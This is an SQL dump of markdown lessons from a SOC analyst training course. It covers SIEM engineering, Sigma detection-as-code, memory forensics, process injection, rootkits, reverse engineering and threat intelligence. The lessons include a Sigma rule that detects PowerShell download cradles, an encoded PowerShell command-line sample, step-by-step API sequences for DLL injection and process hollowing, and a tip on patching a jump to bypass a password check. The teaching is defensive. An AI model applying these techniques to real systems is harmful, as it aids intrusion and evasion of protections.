(655, 346, '## Module 34 Review\nYou have completed the entire Path 3: SOC Analyst Level 1.\n\n### Journey Recap\n1.  **SIEM/EDR/IDS**: The tools.\n2.  **Malware/IR**: The threats and response.\n3.  **Network/Hunting**: The deeper analysis.\n4.  **Cloud/Automation**: The modern environment.\n5.  **Reporting**: The professional output.\n\nCongratulations! You are now ready for the Path 3 Certification Exam.', 'markdown', 15, '2025-12-26 23:13:12', '2025-12-29 14:21:21'),
(656, 361, '## SIEM Architecture Deep Dive\n\nWelcome to the big leagues. In Path 3, we treated the SIEM as a black box that just \"works\". In Advanced SOC roles, you need to know *how* it works, because you will be the one fixing it when it breaks.\n\n### The Pipeline of Data\nA typical Enterprise SIEM (like Splunk or ELK) has a distributed architecture.\n\n1.  **Generation**: The endpoint (Windows) or device (Firewall) creates the log.\n2.  **Collection (The Edge)**:\n    *   **Universal Forwarder (Splunk) / Beats (Elastic)**: Small agents on the endpoint.\n    *   **Syslog Server**: A Linux box acting as a funnel for network devices.\n    *   *Bottleneck Risk*: If the Syslog server disk fills up, you lose firewall logs instantly.\n3.  **Aggregation (The Middleman)**:\n    *   **Heavy Forwarder (Splunk) / Logstash**: Intermediate servers that parse, filter, and mask data (e.g., removing Credit Card numbers) *before* sending it to the core.\n    *   *Why?* To save bandwidth and CPU on the main indexers.\n4.  **Indexing (The Core)**:\n    *   **Indexers**: The heavy lifters. They write the data to disk.\n    *   *Clustering*: Data is replicated across multiple indexers for High Availability.\n5.  **Search Head (The User Interface)**:\n    *   This is what you log into. It doesn\'t store data. It distributes your query to the Indexers, merges the results, and shows you the graph.\n\n### Hot, Warm, Cold Buckets\nStorage is expensive. We can\'t keep petabytes on SSDs.\n*   **Hot Bucket**: Data arriving *right now*. Stored on NVMe SSDs for instant search. (Retained: ~7 days).\n*   **Warm Bucket**: Data from last week. Read-only. Stored on SSDs. (Retained: ~30 days).\n*   **Cold Bucket**: Data from last month. Moved to cheaper HDDs. Slower to search. (Retained: ~1 year).\n*   **Frozen**: Data archived to Amazon S3 Glacier (Tape). Unsearchable unless you \"thaw\" it. 
(Retained: 5-7 years for legal).\n\n### EPS (Events Per Second) Sizing\n*   **Scenario**: A firewall sends 10,000 logs/second.\n*   **Math**: 10k EPS * 500 bytes/log = 5 MB/second = 432 GB/day.\n*   **Impact**: Can your Indexer write 5 MB/s continuously while *also* answering search queries? If not, you need more hardware.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(657, 362, '## Log Parsing & Normalization: The Regex Dojo\n\nYou cannot be a Senior Analyst without knowing Regex (Regular Expressions). When standard parsers fail, you must write your own.\n\n### The Problem: Unstructured Data\nA developer writes a custom app that logs errors like this:\n`[ERROR] User:bob | IP:10.0.0.1 | Msg:Login Failed`\n\nYour SIEM doesn\'t know what \"User:bob\" means. You need to extract \"bob\" into the `user` field.\n\n### Regex Basics\n*   `\\d`: Any digit (0-9).\n*   `\\w`: Any word character (a-z, 0-9, _).\n*   `\\s`: Whitespace.\n*   `+`: One or more.\n*   `*`: Zero or more.\n*   `?`: Optional.\n*   `( )`: Capture group (The part you want to extract).\n\n### Example Extraction\nLog: `[ERROR] User:bob | IP:10.0.0.1`\n\n**Bad Regex**: `User:.* |`\n*   Why? `.*` is greedy. It matches everything until the end. Precise matching is efficient.\n\n**Good Regex**: `User:(\\w+)\\s\\|\\sIP:(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})`\n*   Group 1 (`\\w+`) matches \"bob\".\n*   Group 2 matches the IP.\n\n### Splunk Field Extraction (props.conf / transforms.conf)\nIn Splunk, you define these in config files.\n*   `[my_custom_app]`\n*   `EXTRACT-user = User:(\\w+)`\n\n### Field Aliasing (CIM Compliance)\n*   Your app logs it as `client_ip`.\n*   Splunk CIM expects `src`.\n*   **Alias**: `FIELDALIAS-c_ip = client_ip AS src`\n*   Now, a search for `src=10.0.0.1` will find your logs automatically.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(658, 363, '## Advanced Correlation: Risk-Based Alerting (RBA)\n\nTraditional correlation (\"3 failed logins = Alert\") generates too much noise. **RBA** is the modern approach managed by Advanced SOCs.\n\n### The Concept\nInstead of triggering an alert *immediately*, we assign **Risk Points** to an entity (User or System).\n\n*   **Rule 1**: User triggered \"Possible Phishing Link\". (Confidence: Low).\n    *   Current Logic: Alert Analyst -> False Positive 90%.\n    *   RBA Logic: Add **+10 Risk Points** to User. (No Alert).\n*   **Rule 2**: User triggered \"Unusual PowerShell\". (Confidence: Medium).\n    *   RBA Logic: Add **+30 Risk Points** to User.\n*   **Rule 3**: User triggered \"Data Upload to Personal Cloud\". (Confidence: Low).\n    *   RBA Logic: Add **+20 Risk Points** to User.\n\n### The Threshold Alert\n*   **Total Risk Score**: 10 + 30 + 20 = **60**.\n*   **Threshold Rule**: \"Alert when Risk Score > 50\".\n*   **Result**: The analyst gets ONE high-fidelity alert (\"User with Risk 60\") that tells the whole story, instead of 3 low-fidelity alerts.\n\n### Implementing Kill Chains\nAdvanced correlation tracks the sequence.\n`transaction` command in Splunk loops events together by ID.\n*   If `Event A` (Firewall Permit) AND `Event B` (IDS SQL Injection) occur within 10 seconds...\n*   Combine them into a generic \"Exploit Attempt\" meta-event.\n\n### Statistical Anomaly Detection (Standard Deviation)\n*   Calculate the average daily outbound traffic for `Payroll_Server` over 30 days (`avg=50MB`, `stdev=10MB`).\n*   **Rule**: Alert if Today > `avg + (3 * stdev)`.\n*   (If today represents 80MB, that\'s 3 sigmas away—statistically extremely rare).\n*   *Advantage*: You don\'t need to know the *exact* number; the math finds the outlier for you.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(659, 364, '## Query Optimization: Speed is Survival\n\nIn a crisis, waiting 15 minutes for a search to complete is unacceptable. You must write efficient queries.\n\n### 1. The \"Left-to-Right\" Rule (Pipeline Processing)\nMost SIEMs process data in a pipeline. You want to filter the massive dataset **as early as possible** (on the left side).\n\n*   **Bad Splunk Query**:\n    `index=main | regex \"password\" | where status=200`\n    *   Why? The index contains 1 Billion events. It pulls ALL of them, runs a heavy Regex on ALL of them, and *then* checks status.\n*   **Good Splunk Query**:\n    `index=main status=200 \"password\"`\n    *   Why? It effectively uses the \"index\" to only retrieve events that already have `status=200` and the string \"password\". It might retrieve only 100 events.\n\n### 2. Avoid \"Leading Wildcards\"\n*   `index=main user=*bob`\n*   Why is this bad? The database is indexed alphabetically.\n    *   `abc`\n    *   `bob`\n    *   `zack`\n    *   If you search `bob*`, it jumps to \"B\" instantly.\n    *   If you search `*bob`, it must scan `abc`, `bob`, `zack`... literally every single word in the dictionary to see if it ends in \"bob\". It destroys CPU.\n\n### 3. Specify Time Ranges\n*   Never search \"All Time\".\n*   Always narrow down to \"Last 60 minutes\" or \"Specific Date Window\".\n\n### 4. Fast Mode vs. Verbose Mode\n*   **Fast Mode**: Returns only field summary/statistics. (Super fast).\n*   **Verbose Mode**: Returns every raw event text. (Slow).\n*   If you just need a count (`stats count`), use Fast Mode.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(660, 365, '## Building Detection-as-Code (DaC)\n\nThe old way: Click \"Create Rule\" in the GUI. Type stuff. Save.\nThe new way: Rules are logic. Logic is Code.\n\n### Why Code?\n1.  **Version Control (Git)**:\n    *   \"Who changed the Ransomware rule yesterday?\" -> Check Git Commit History.\n    *   \"The new rule broke the SIEM.\" -> `git revert`.\n2.  **Testing (CI/CD)**:\n    *   Before deploying a rule to Production, run it in a pipeline against a test dataset.\n    *   \"Does this rule trigger on this sample `malware.evtx`?\" (Unit Test).\n\n### Sigma: The Standard Format\n**Sigma** is a generic signature format for SIEMs (like Snort is for IDS). It is written in YAML.\n\n```yaml\ntitle: Suspicious PowerShell Download\nstatus: experimental\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection:\n        EventID: 4104\n        ScriptBlockText|contains:\n            - \'Net.WebClient\'\n            - \'DownloadString\'\n    condition: selection\nlevel: high\n```\n\n### The Workflow\n1.  Analyst writes triggers in Sigma (YAML).\n2.  Commits to GitHub.\n3.  **Sigmac** (Compiler) converts the YAML into:\n    *   Splunk SPL (`index=windows EventID=4104 ...`)\n    *   Elastic Query (Lucene)\n    *   Azure Sentinel (KQL)\n4.  Automation pushes the query to the SIEM API.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 16:13:12'),
(661, 366, '## Module 36 Review\nAdvanced SIEM is Engineering.\n*   **Architecture**: How data flows.\n*   **RBA**: Reducing noise by scoring.\n*   **Optimization**: Writing fast queries.\n*   **DaC**: Managing rules via Git.\n\nNext: Digging into RAM with Memory Forensics.', 'markdown', 20, '2025-12-27 02:16:31', '2025-12-29 14:22:44'),
(662, 371, '## Why Memory Forensics?\n\nDisk Forensics is great, but it has limits.\n*   **Encryption**: If the disk is BitLocker encrypted and the computer is off, the data is gone.\n*   **Fileless Malware**: Some malware lives *only* in RAM. It never touches the hard drive. If you pull the plug, the evidence vanishes.\n*   **Rootkits**: Kernel-level rootkits can lie to the OS, but they cannot hide from memory analysis (mostly).\n\n### What lives in RAM?\nEverything the computer is thinking about *right now*.\n1.  **Running Processes** (and their injected DLLs).\n2.  **Network Connections** (Active sockets).\n3.  **Command History** (cmd.exe / powershell.exe buffers).\n4.  **Passwords/Keys**:\n    *   BitLocker keys.\n    *   Mimikatz output.\n    *   User passwords (sometimes in cleartext if poorly coded apps are running).\n5.  **Clipboard Contents**: What did the user just Copy/Paste?\n\n### The Principle of Exchange\nRAM is extremely volatile. Every second the computer is on, thousands of pages of memory are being overwritten. Speed is essential.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(663, 372, '## Memory Acquisition Techniques\n\nTaking a \"picture\" of RAM is trickier than disk.\n\n### 1. Hardware-Based Acquisition (DMA)\n*   **FireWire / Thunderbolt**: These ports have Direct Memory Access (DMA).\n*   **Method**: Plug in a specialized device. It can read RAM directly without the CPU even knowing.\n*   **Pros**: Undetectable by malware.\n*   **Cons**: Requires physical ports; modern OS protections (DMA Mapping) often block this.\n\n### 2. Software-Based Acquisition (Kernel Driver)\n*   **Method**: Run a tool (Administrator privileges required) that loads a Kernel Driver to read physical memory.\n*   **Tools**:\n    *   **WinPMEM**: Part of the Rekall framework.\n    *   **DumpIt**: Simple, one-click dumper.\n    *   **FTK Imager**: GUI-based.\n*   **Risk**: Loading a driver *changes* the memory you are trying to measure (Heisenberg Uncertainty Principle). It might trigger a Blue Screen of Death (BSOD) if the system is unstable.\n\n### 3. Virtual Machine Snapshots\n*   If the target is a VM (VMware/Hyper-V), you are lucky.\n*   **Method**: Just take a Snapshot \"with memory\".\n*   **File**: `.vmem` file. This is a perfect, uncorrupted copy of the RAM. No tools needed on the guest.\n\n### The hiberfil.sys file\n*   When a laptop hibernates (sleeps), Windows writes the entire contents of RAM to `C:\\hiberfil.sys`.\n*   **Forensic Gold**: You can convert this file into a raw memory image and analyze it, even if the computer is currently off.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(664, 373, '## Volatility Framework Deep Dive\n\n**Volatility** is the industry-standard (Command Line) tool for analyzing memory dumps. It supports Windows, Linux, and Mac.\n\n### The Profile (Volatility 2 vs 3)\n*   **Volatility 2**: Required you to specify the \"Profile\" manually (e.g., `Win10x64_1909`). If you got it wrong, it output garbage.\n*   **Volatility 3**: Modern version. It detects the OS automatically using Symbol Tables.\n\n### Essential Commands (Plugins)\nAssuming you have a distinct memory image `mem.dmp`:\n\n1.  **pslist / psscan**: List processes.\n    *   `pslist`: Walks the \"Active Process Head\" (What Windows *admits* is running).\n    *   `psscan`: Scans raw memory bytes for EPROCESS structures. (Finds \"Hidden\" processes that unlinked themselves from the list).\n    *   *Comparison*: If a PID shows up in `psscan` but NOT `pslist`, it is a **Rootkit**.\n2.  **netscan**: List network connections.\n    *   Shows Protocol, Local IP, Remote IP, State (ESTABLISHED), and PID.\n    *   \"Why is `notepad.exe` connected to Russia on Port 4444?\"\n3.  **malfind**: Detects code injection.\n    *   It looks for memory pages that are:\n        *   Executable (RWX permissions).\n        *   Start with `MZ` header (Executable file) OR generic Shellcode patterns.\n    *   Output: Hex dump of the injection.\n4.  **dlllist**: List loaded DLLs for a process.\n    *   \"Why does `svchost.exe` have `cryptominer.dll` loaded?\"\n5.  **cmdline**: Shows the command line arguments.\n    *   `powershell.exe -w hidden -enc JABz...` (Base64 encoded evil script).\n\n### Workflow\n1.  Identify rogue networking (`netscan`). -> Found PID 1234.\n2.  Investigate process (`pslist`). -> PID 1234 is `svchost.exe`.\n3.  Check parent (`pstree`). -> Parent is `explorer.exe`. (BAD. `svchost` should come from `services.exe`).\n4.  Check injection (`malfind -p 1234`). -> Found RWX memory segment.\n5.  Dump the malware (`procdump -p 1234`). 
-> Save to disk for Reverse Engineering.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(665, 374, '## Process Analysis & Injection Detection\n\nMalware rarely runs as `virus.exe`. It hides inside legitimate processes. This is **Process Injection**.\n\n### 1. DLL Injection\n*   **Concept**: Force a legitimate process (e.g., Chrome) to load a malicious DLL.\n*   **Mechanism**:\n    1.  Malware runs.\n    2.  Allocates memory in Chrome (VirtualAllocEx).\n    3.  Writes path to evil DLL (WriteProcessMemory).\n    4.  CreateRemoteThread starting at LoadLibrary(\"evil.dll\").\n*   **Result**: The malware code runs *inside* Chrome\'s memory space. Firewalls allow Chrome.\n\n### 2. Process Hollowing (RunPE)\n*   **Concept**: A zombie suit.\n*   **Mechanism**:\n    1.  Start a legitimate process (e.g., `svchost.exe`) in \"Suspended Mode\".\n    2.  Unmap (Hollow out) the legitimate code from memory.\n    3.  Write the malware code into that empty space.\n    4.  Resume the thread.\n*   **Result**: Task Manager says \"svchost.exe\". The Hash on disk is clean (Microsoft signed). But the memory is pure malware.\n*   **Detection**: **Volatility `malfind`** spots this mismatch between the file on disk (VAD) and the content in RAM.\n\n### 3. Reflective DLL Injection\n*   Loading a DLL directly from memory without it ever touching the disk.\n*   Extremely hard to detect with traditional AV.\n*   Used heavily by tools like **Cobalt Strike** and **Metasploit** (Meterpreter).\n\n### 4. Atom Bombing / Propagate\n*   Using obscure Windows API mechanisms (Atom Tables, GUI Event Hooks) to trigger code execution in other processes without using the noisy \"CreateRemoteThread\" call.\n\n### The Analyst\'s Eye\nIn Memory Forensics, you look for **Inconsistencies**.\n*   The PEB (Process Environment Block) says the path is `C:\\Windows\\System32\\svchost.exe`.\n*   The VAD (Virtual Address Descriptor) says the memory map is Private Commit (not mapped from a file).\n*   This discrepancy confirms Hollowing.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(666, 375, '## Hunting Rootkits & Hidden Processes\n\n**Rootkits** are the ninjas of malware. They modify the Kernel (Ring 0) to intercept the reality presented to the OS.\n\n### Direct Kernel Object Manipulation (DKOM)\n*   Windows keeps a list of processes in a Doubly Linked List (ActiveProcessLinks).\n*   Task Manager iterates this list to show you what runs.\n*   **The Attack**: A Rootkit simply \"unlinks\" its process node from the list.\n    *   Previous -> Next.\n    *   It literally disconnects itself.\n    *   The OS still schedules CPU time for it (because the Scheduler uses a different list), so it runs. But tools (TaskMgr, Sysinternals) that rely on the API list cannot see it.\n\n### Hunting with Cross-View Analysis\nThe technique of comparing different \"views\" of the system to find lies.\n*   **View 1**: The API List (`pslist`). (Modified by Rootkit).\n*   **View 2**: The Scheduler / Thread List (`thrdscan`). (Harder to modify without crashing).\n*   **View 3**: CSRSS Handles (`handles`).\n*   **Method**: `psscan` (Volatility) scans the raw physical RAM for structures that *look* like processes (EPROCESS blocks).\n    *   If `psscan` finds it, but `pslist` misses it -> **Rootkit Confirmed**.\n\n### Hooks (SSDT Hooking)\n*   **SSDT (System Service Descriptor Table)**: The map of System Calls.\n*   **Attack**: Malicious driver overwrites the address of `NtQueryDirectoryFile`.\n    *   Original: Points to `ntoskrnl.exe`.\n    *   Hooked: Points to `evil_rootkit.sys`.\n*   When you ask for a file list, the Rootkit code runs first, filters the results, and then passes the request to the real Kernel.\n*   **Detection**: **`ssdt`** plugin in Volatility checks if any function pointer points outside the valid Kernel memory range.', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 16:13:12'),
(667, 376, '## Module 37 Review\nMemory Forensics is the ultimate truth.\n*   **Volatility**: The tool.\n*   **Injection**: Looking for RWX pages (`malfind`).\n*   **Rootkits**: Using Cross-View analysis (`pslist` vs `psscan`) to find hidden threats.\n\nNext: Reverse Engineering (Understanding the code itself).', 'markdown', 20, '2025-12-27 02:18:03', '2025-12-29 14:22:44'),
(668, 381, '## RE Fundamentals: The Art of Dissection\n\n**Reverse Engineering (RE)** is taking apart a system to understand how it works. In malware analysis, it means turning a compiled binary (`.exe`) back into readable logic (Assembly/C).\n\n### Compiled vs. Interpreted\n*   **Interpreted (Python/JS)**: You receive the source code. Analysis is just \"reading\".\n*   **Compiled (C/C++/Go)**: The source code is translated into **Machine Code** (0s and 1s) by a compiler. You cannot see variable names or comments.\n\n### The Tools of the Trade\n1.  **Disassembler**: Translates Machine Code (Hex) into **Assembly Language** (ASM).\n    *   *Tool*: IDA Pro, Ghidra (Free, by NSA).\n    *   *Output*: `MOV EAX, 1` (Move 1 into Register EAX).\n2.  **Decompiler**: Attempts to translate ASM back into pseudo-C code.\n    *   *Tool*: Ghidra, Hex-Rays.\n    *   *Output*: `if (variable1 == 1) { download_virus(); }`\n    *   *Note*: It is never 100% accurate, but it is much easier to read than ASM.\n3.  **Debugger**: Runs the code step-by-step (Dynamic).\n    *   *Tool*: x64dbg (Windows), GDB (Linux).\n    *   *Action*: \"Pause execution right before it encrypts the file so I can see the key in memory.\"\n\n### The Goal of RE\nYou are not trying to re-write the source code. You are trying to answer specific questions:\n1.  Does it contain a Domain Generation Algorithm (DGA)?\n2.  What is the hardcoded C2 IP?\n3.  How does it bypass the Anti-Virus?', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(669, 382, '## x86/x64 Assembly Essentials\n\nYou don\'t need to write Assembly, but you must read it.\n\n### Registers (The CPU\'s pockets)\nThe CPU has small storage slots called Registers.\n*   **EAX / RAX**: The \"Accumulator\". Used for math and **Return Values**. (If a function returns \"Success\", EAX is usually 1 or 0).\n*   **EBX / RBX**: Base.\n*   **ECX / RCX**: Counter. Used in loops.\n*   **EDX / RDX**: Data.\n*   **EIP / RIP**: **Instruction Pointer**. This is the most important register. It points to the *next instruction* the CPU will execute.\n    *   *Buffer Overflow*: If you can overwrite EIP, you control the CPU.\n*   **ESP / RSP**: Stack Pointer. Points to the top of the stack.\n\n### Common Instructions\n1.  **MOV destination, source**: Copy data.\n    *   `MOV EAX, 5` -> Put 5 into EAX.\n2.  **ADD / SUB**: Math.\n3.  **CMP A, B**: Compare A and B.\n4.  **JMP / JZ / JNZ** (Jumps): The logic flow (If statements).\n    *   `CMP EAX, 0` (Check if EAX is 0)\n    *   `JZ 402000` (Jump if Zero to memory address 402000).\n    *   *Hacking Tip*: If you change `JZ` (Jump if Zero) to `JNZ` (Jump if NOT Zero), you can flip the logic of the program. (e.g., \"Is Password Correct?\" -> \"No\" -> \"Login Anyway\").\n\n### The Stack (LIFO)\nTemporary memory for functions.\n*   **PUSH**: Put something on top of the stack.\n*   **POP**: Take it off.\n*   Think of it like a stack of plates.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(670, 383, '## Static Analysis with Ghidra\n\n**Ghidra** is the NSA\'s gift to the community. It is a powerful, free Disassembler/Decompiler.\n\n### The Interface\n1.  **Program Tree**: Sections of the file (.text, .data, .rsrc).\n2.  **Listing View**: The Assembly code (linear view).\n3.  **Decompiler View**: The C-like pseudo-code. **(This is where you live)**.\n4.  **Symbol Tree**: List of Functions and Imports.\n\n### The Workflow\n1.  **Import**: Drag and Drop the malware.\n2.  **Analyze**: Run the auto-analysis (identifies functions, strings).\n3.  **Search Strings**: Find \"http\". Double click it.\n4.  **X-Ref (Cross Reference)**: Right-Click the string -> \"References\".\n    *   This shows *where in the code* that string is used.\n    *   Clicking it takes you to the `Main()` function that calls the C2.\n5.  **Rename**: Ghidra names variables `DAT_12345` or `FUN_401000`.\n    *   Your job is to read the logic.\n    *   \"This function takes a URL and downloads a file.\" -> Press `L`. Rename to `Download_File`.\n    *   \"This variable holds the IP.\" -> Rename to `C2_IP`.\n    *   Slowly, the code becomes readable.\n\n### Graph View\nVisualizes the control flow.\n*   Boxes are blocks of code.\n*   Arrows are Jumps (Green for Yes, Red for No).\n*   If you see a complex knot of arrows, it\'s a loop.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(671, 384, '## Debugging with x64dbg\n\nStatic analysis is hard when the code is obfuscated. A **Debugger** lets you run it and watch.\n\n### Key Concepts\n1.  **Breakpoints (BP)**: Tripwires using Software Interrupts (INT 3).\n    *   You tell the debugger: \"Run until you hit address 401050, then PAUSE.\"\n    *   *Use*: Put a BP on `CreateFileW`. The malware will run until it tries to create a file, then freeze. You can then look at the stack to see the *filename* it is trying to write.\n2.  **Stepping**:\n    *   **Step Into (F7)**: Go inside the function call.\n    *   **Step Over (F8)**: Run the function and pause after it returns. (Use this to skip boring library functions like `printf`).\n3.  **Register/Memory View**:\n    *   Watch the EAX register change as you step.\n    *   Watch the memory dump to see encrypted strings suddenly become decrypted.\n\n### Patching\nYou can modify the binary in memory.\n*   **Scenario**: The malware checks `If (Year == 2023)`. It is 2025, so it quits.\n*   **Fix**:\n    1.  Find the `CMP Year, 2023` and `JNE Exit` instructions.\n    2.  Change the `JNE` (Jump Not Equal) to `NOP` (No Operation - Do nothing).\n    3.  The malware continues running.\n\n### Anti-Debugging\nMalware hates debuggers.\n*   **IsDebuggerPresent()**: A Windows API function that returns 1 if being debugged.\n*   **RDTSC**: Read Time Stamp Counter. Measures CPU cycles.\n    *   \"It took 5,000,000 cycles to run this instruction. Humans are slow. A debugger must be attached.\" -> *Self Destruct*.\n*   **Bypass**: Use plugins like **ScyllaHide** to hide your debugger from these checks.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(672, 385, '## Unpacking & Anti-Analysis\n\nMost malware is \"Packed\" (Compressed/Encrypted) to hide from AV signatures.\n\n### The Packer Lifecycle\n1.  **The Stub**: The small piece of code you actually see.\n2.  **Unpacking**: The Stub decrypts the *real* malware (Payload) from its data section and writes it into memory.\n    *   *Technique*: Uses `VirtualAlloc` (Get memory) -> `RtlDecompressBuffer` -> `VirtualProtect` (Make executable).\n3.  **Transfer (OEP)**: The Stub jumps to the **Original Entry Point** (OEP) of the payload.\n4.  **Execution**: The real malware runs.\n\n### Manual Unpacking Technique\n1.  Load packed malware into x64dbg.\n2.  Set breakpoints on `VirtualAlloc` and `VirtualProtect`.\n3.  Run code. It breaks when it allocates memory.\n4.  Watch that memory region. Step over until you see the PE Header (`MZ`) appear in the memory dump.\n5.  **Dump It**: Use \"Scylla\" (plugin) to save that memory region to a file (`unpacked.exe`).\n6.  Now open `unpacked.exe` in Ghidra. You will see the real strings and logic.\n\n### Dealing with Obfuscation\n*   **Dead Code**: Junk instructions that do nothing (`ADD EAX, 0`) just to confuse you.\n*   **Control Flow Flattening**: Breaking linear code into a confusing switch-statement mess.\n*   **String Encryption**: Strings are stored as `XOR 0x55`. The malware decrypts them only when needed.\n*   *Solution*: FLOSS (FireEye Labs Obfuscated String Solver). It runs code heuristics to find and extract obfuscated strings automatically.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 16:13:25'),
(673, 386, '## Module 38 Review\nReverse Engineering is the deepest level of analysis.\n*   **Assembly**: The language of the CPU.\n*   **Ghidra**: The static map.\n*   **x64dbg**: The dynamic probe.\n*   **Unpacking**: Removing the armor to see the code.\n\nNext: Applying this knowledge to Threat Intelligence.', 'markdown', 20, '2025-12-27 02:19:34', '2025-12-29 14:22:44'),
(674, 391, '## The Threat Intel Lifecycle\n\nThreat Intelligence (CTI) is knowledge about adversaries. It moves security from \"What is hitting me?\" to \"Who is hitting me and why?\"\n\n### The Lifecycle\n1.  **Planning & Direction**: The \"Requirements\".\n    *   \"We are a Bank. We care about Fin7 (Credit Card thieves). We don\'t care about APTs targeting Aerospace.\"\n2.  **Collection**: Gathering raw data.\n    *   Open Source (OSINT): Twitter, GitHub, Blogs.\n    *   Closed Source: Vendor feeds (CrowdStrike, Mandiant), Deep Web forums.\n    *   Technical: HoneyPots, Malware Sandboxes.\n3.  **Processing**: Cleaning and normalizing.\n    *   Converting a PDF report into a list of IPs (STIX format).\n4.  **Analysis**: Making sense of it.\n    *   \"This new IP belongs to the same subnet used by Lazarus Group last year. It implies Lazarus is back.\"\n5.  **Dissemination**: Sending it to the right people.\n    *   **Strategic**: To the CISO (\"Risk is elevated\").\n    *   **Tactical**: To the SOC (\"Block these IPs\").\n6.  **Feedback**: \"Was this useful?\"\n\n### Types of CTI\n*   **Strategic**: High-level trends for Executives. (\"Ransomware is up 200%\").\n*   **Operational**: TTPs for Hunters. (\"They use PowerShell Empire\").\n*   **Tactical**: IOCs for SIEMs. (Hashes, IPs).', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(675, 392, '## Collection & Sources (OSINT vs. INT)\n\nWhere do we get the dirt?\n\n### OSINT (Open Source Intelligence)\n*   **Twitter (InfoSec Twitter)**: Often the fastest source. Researchers post \"I just found this C2\" minutes after detection.\n*   **VirusTotal**: The world\'s malware database.\n    *   *Hunting*: \"Search for all files that communicate with `bad-domain.com`.\"\n*   **Shodan/Censys**: Search engines for the Internet of Things.\n    *   \"Show me all servers running vulnerable Exchange 2016 in Germany.\"\n*   **AlienVault OTX (Open Threat Exchange)**: Crowd-sourced pulses.\n\n### Paid Feeds (Commercial)\n*   Companies like Recorded Future, Mandiant, Proofpoint.\n*   They have spies in Dark Web forums.\n*   Value: **Context**. Not just \"Block IP X\", but \"IP X is a Cobalt Strike server rented by Ryuk Ransomware affiliates.\"\n\n### ISACs (Information Sharing and Analysis Centers)\n*   Industry groups (FS-ISAC for Finance, H-ISAC for Health).\n*   \"We (Bank A) got hit by this. Here are the IOCs so you (Bank B) can block it.\"\n*   *Trust*: High.\n\n### Dark Web (Tor)\n*   Monitoring Ransomware leak sites.\n*   \"Company X has 2 days to pay.\" -> If Company X is your vendor, you have a Third-Party Risk problem.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(676, 393, '## Analysis & Attribution: The \"Who\"\n\nAttribution (Naming the actor) is hard and often political.\n\n### Levels of Attribution\n1.  **Infrastructure**: \"This attack came from IP 1.2.3.4 (DigitalOcean VPN).\" (Low value).\n2.  **Tooling**: \"They used \'PoisonIvy\', which is often used by Chinese groups.\" (Medium).\n3.  **TTPs**: \"They used the exact same 5-step process as APT10.\" (High).\n4.  **Strategic**: \"The attack targeted a dissident journalist critical of Country X.\" (Motivation).\n\n### The Diamond Model of Intrusion Analysis\nA simple shape to map attacks.\n1.  **Adversary**: Who? (Russia).\n2.  **Infrastructure**: What? (IPs/Domains).\n3.  **Capability**: How? (Malware/Exploits).\n4.  **Victim**: Whom? (You).\n*   *Pivot*: If you find a Malware sample (Capability) used by an Adversary, you can pivot to find their Infrastructure.\n\n### Cognitive Biases\nAnalysts must avoid traps.\n*   **Confirmation Bias**: Looking for evidence that supports your theory (\"It\'s Russia\") and ignoring evidence that contradicts it.\n*   **Mirror Imaging**: Assuming the attacker thinks like you. (\"They wouldn\'t attack on Christmas.\" Yes, they would).\n*   **False Flag**: Attackers are sophisticated. The \"Olympic Destroyer\" malware (Russia) contained code snippets from North Korea to confuse analysts.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
(677, 394, '## STIX/TAXII & Sharing\n\nWe need a standard language to share Intel between machines.\n\n### STIX (Structured Threat Information Expression)\nA JSON format for describing threats.\n*   **Objects**:\n    *   `Threat Actor`: The bad guy.\n    *   `Attack Pattern`: The TTP (CAPEC/ATT&CK).\n    *   `Indicator`: The Regex/Rule to find it.\n    *   `Observed Data`: The IP/Hash.\n*   *Example*: \"Actor A (STIX) uses Malware B (STIX) which connects to IP C (STIX).\"\n\n### TAXII (Trusted Automated Exchange of Intelligence Information)\nThe transport protocol (HTTPS API) to move STIX objects.\n*   **Server**: Host the feed (e.g., Anomali Limo).\n*   **Client**: Your SIEM polls the server.\n*   \"Hey Server, give me all new High-Confidence Ransomware IPs since yesterday.\"\n*   Server responds with STIX JSON.\n\n### MISP (Malware Information Sharing Platform)\nThe most popular Open Source Threat Intel Platform (TIP).\n*   Org A puts malware data into MISP.\n*   Org B\'s MISP syncs with Org A.\n*   Your SIEM connects to MISP and downloads the blocklist automatically.', 'markdown', 20, '2025-12-27 02:21:01', '2025-12-29 16:13:25'),
